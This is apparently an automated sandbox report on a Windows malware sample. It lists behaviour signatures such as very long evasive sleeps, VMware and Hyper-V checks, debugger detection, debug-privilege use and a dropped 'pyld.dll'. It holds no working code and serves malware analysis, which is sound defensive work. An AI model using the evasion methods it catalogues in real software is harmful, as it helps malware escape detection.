Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5061 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4774 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6618 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3027 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6575 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3150 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6281 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3351 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3579
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7412
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2074
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7423
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2154
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7609
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1988
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\System32\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\Public\pyld.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\svchost.exe API coverage: 1.2 %
Source: C:\Windows\System32\console_zero.exe API coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep count: 5061 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep count: 4774 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep count: 6618 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848 Thread sleep count: 3027 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 Thread sleep count: 6575 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960 Thread sleep count: 3150 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1560 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3836 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648 Thread sleep count: 6281 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080 Thread sleep count: 3351 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\console_zero.exe TID: 2472 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684 Thread sleep count: 3579 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128 Thread sleep count: 1765 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5240 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592 Thread sleep count: 7412 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844 Thread sleep count: 2074 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 6360 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 Thread sleep count: 7423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep count: 2154 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824 Thread sleep count: 7609 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824 Thread sleep count: 1988 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 6608 Thread sleep count: 116 > 30
Source: C:\Windows\System32\timeout.exe TID: 2824 Thread sleep count: 143 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\app64.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Windows\System32\svchost.exe Code function: 28_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h 28_2_64946F50
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C568 FindClose,FindFirstFileExW,GetLastError, 34_2_00007FF74713C568
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 34_2_00007FF74713C5DC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\console_zero.exe Thread delayed: delay time: 46000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exe Thread delayed: delay time: 46000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000003.00000002.2256489419.000002713D208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}_
Source: powershell.exe, 00000003.00000002.2256489419.000002713D208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: powershell.exe, 00000003.00000002.2256489419.000002713D1A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3268859281.000001D8E782B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2620974839.000001801B68B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\app64.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\svchost.exe Code function: 28_2_649461C0 IsDebuggerPresent,RaiseException, 28_2_649461C0
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AFC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free, 28_2_00007FF8B83AFC30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
